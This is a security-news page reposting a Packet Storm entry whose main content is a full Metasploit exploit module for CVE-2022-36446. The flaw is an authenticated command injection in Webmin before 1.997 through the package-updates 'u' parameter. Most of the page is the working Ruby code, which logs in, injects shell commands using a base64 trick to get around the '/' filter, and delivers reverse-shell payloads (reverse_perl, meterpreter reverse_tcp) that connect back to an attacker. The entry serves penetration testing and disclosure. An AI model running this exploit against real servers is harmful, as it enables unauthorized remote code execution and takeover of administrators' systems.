Security
Headlines
HeadlinesLatestCVEs

Headline

Webmin Package Updates Command Injection

This Metasploit module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module.

Packet Storm
#web#linux#git#rce#perl#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Webmin Package Updates RCE',        'Description' => %q{          This module exploits an arbitrary command injection in Webmin          versions prior to 1.997.          Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform          package updates and installation. Due to a lack of input          sanitization, it is possibe to inject arbitrary command that will be          concatenated to the package manager call.          This exploit requires authentication and the account must have access          to the Software Package Updates module.        },        'License' => MSF_LICENSE,        'Author' => [          'Christophe De La Fuente', # MSF module          'Emir Polat' # Discovery and PoC        ],        'References' => [          [ 'EDB', '50998' ],          [ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'],          [ 'CVE', '2022-36446']        ],        'DisclosureDate' => '2022-07-26',        'Platform' => ['unix', 'linux'],        'Privileged' => true,        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],        'Payload' => { 'BadChars' => '/' },        'DefaultOptions' => {          'RPORT' => 10000,          'SSL' => true        },        'Targets' => [          [            'Unix In-Memory',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }            }          ],          [            'Linux Dropper (x86 & x64)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'Linux Dropper (ARM64)',            {              'Platform' => 'linux',              'Arch' => ARCH_AARCH64,              'Type' => :linux_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']),        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ false, 'Password to login with', '123456'])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res    if res.body.include?('This web server is running in SSL mode.')      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")    end    version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first    return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version    version = Rex::Version.new(version)    vprint_status("Webmin #{version} detected")    unless version < Rex::Version.new('1.997')      return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")    end    vprint_good("Webmin #{version} is a supported target")    CheckCode::Appears  rescue ::Rex::ConnectionError    return CheckCode::Unknown("#{peer} - Could not connect to web service")  end  def do_login    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/session_login.cgi'),      'headers' => { 'Referer' => full_uri },      'cookie' => 'testing=1',      'keep_cookies' => true,      'vars_post' => {        'user' => datastore['USERNAME'],        'pass' => datastore['PASSWORD']      }    })    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302    print_good('Logged in!')  end  def execute_command(cmd, _opts = {})    cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"')    cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}"    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/package-updates/update.cgi'),      'headers' => { 'Referer' => full_uri },      'vars_post' => {        'mode' => 'new',        'search' => rand_text(10),        'redir' => '',        'redirdesc' => '',        'u' => cmd,        'confirm' => 'Install Now'      }    })  end  def exploit    print_status('Attempting login')    do_login    print_status('Sending payload')    case target['Type']    when :unix_memory      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  endend

Related news

Webmin 1.996 Remote Code Execution

Webmin version 1.996 suffers from an authenticated remote code execution vulnerability.

CVE-2022-36446: Comparing 1.996...1.997 · webmin/webmin

software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6